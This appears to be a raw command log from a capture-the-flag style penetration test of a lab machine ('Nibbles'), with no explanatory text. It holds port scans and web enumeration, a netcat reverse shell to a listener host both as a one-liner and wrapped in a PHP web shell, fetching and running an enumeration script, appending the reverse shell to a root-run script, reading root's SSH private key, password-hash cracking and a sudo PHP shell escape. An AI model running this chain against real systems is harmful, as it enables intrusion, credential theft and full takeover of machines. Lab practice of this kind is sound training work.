sudo -u user2 /bin/bash
cat /root/.ssh/id_rsa
ssh root@$IP -p $PORT -i key
IP=94.237.48.12
PORT=33731
nmap $IP -sV --open -oA initial-scan 
nmap $IP -p- --open -oA full-tcp-scan 
nc -nv $IP 22
nc -nv $IP 80
nmap -sC -p 22,80 -oA nibbles_script_scan $IP
nmap -sV --script=http-enum -oA nibbles_nmap_http_enum $IP
IP=10.129.200.170
gobuster dir -u http://$IP --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt
curl http://$IP/nibbleblog/content/private/plugins/my_image/image.php
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 9443 >/tmp/f
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 9443 >/tmp/f"); ?>
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
wget http://$IP:8080/LinEnum.sh
IP=10.10.14.24
chmod +x LinEnum.sh
./LinEnum.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP 8443 >/tmp/f' | tee -a monitor.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 8443 >/tmp/f' | tee -a monitor.sh

hashcat -m 100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
<?php system('id'); ?>
sudo python3 -m http.server 8080
wget http://10.10.14.24:8080/LinEnum.sh
sudo /usr/bin/php -r :"system('/bin/sh');"

sudo nmap $IP -A --open
